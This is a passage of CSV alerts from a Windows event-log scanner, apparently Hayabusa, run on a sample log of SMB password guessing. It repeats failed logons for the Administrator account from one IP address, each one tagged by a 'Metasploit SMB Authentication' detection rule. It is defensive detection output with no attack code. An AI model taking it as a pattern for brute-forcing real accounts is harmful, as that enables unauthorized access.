Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PIF47pEWBMp6Nbym : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6TO891WvJPkdjsct : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6cLnJYpHEzGAvhWG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gy6cFTrwrpRQFxfQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gxz612Z88PMCKzAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GSPC8hibdZdyOcex : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6vlmykLeFmuhn81B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4w4lEW9w53zMFPcc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jt2lDRFWwi6adwlB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G9MGvle35u5OGB5o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJgLFM2vrnKuj5N3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8HRyDAzwKj9bfnA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J65LcwnRgEob9wjY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yhas9e1fwDZ1Fxvt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5qJRSpjS6tZJjNQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bo4HAgP2tw0GmZ4o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zv0cbLCD7E05i0g5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FIKsQLk5iPyKoeqM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RiHAaBszJBGe2deQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8em4eOiqze683Cj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86lXQsnn7dae93tW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Iu8olNGPmhxh6iNu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qZYtN5EMHxcNqID6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mtUQGxrMoPkpUQCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QYh4e3bpePhDoRwr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UkC8E9uKpCgD1BHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ZCDxpmDZbpGCey3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SS2dxS3WvCrAyiB2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YT3VHxKNf8q14rro : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fx9HQT3u3Ig6vJ3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FukPQsr4SXRshyTn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7AutKUyPELNRUcA4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 38gBkWcYdZW6Wcdz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HMKnLRQCDn1CHZdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ShGnRYHfVSuPvfcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LXVWG3Yl0utv98Zf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VDfa0UebgleQMK5U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxTLJJsWs9dOc5JC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x7cKtymmsQJSM6zZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbtC0srNyvkIHOSV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wPGlJ6ZjGSfUKrCf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Uw95Ema8vWlRXKy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hHTrBmhkjGLTNt2R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJeRVGKULJIo76aa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Kipf0Z2Tse2eWoxa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bnP7tmMJXDVzIDim : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CBeMt62oqlIICShT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 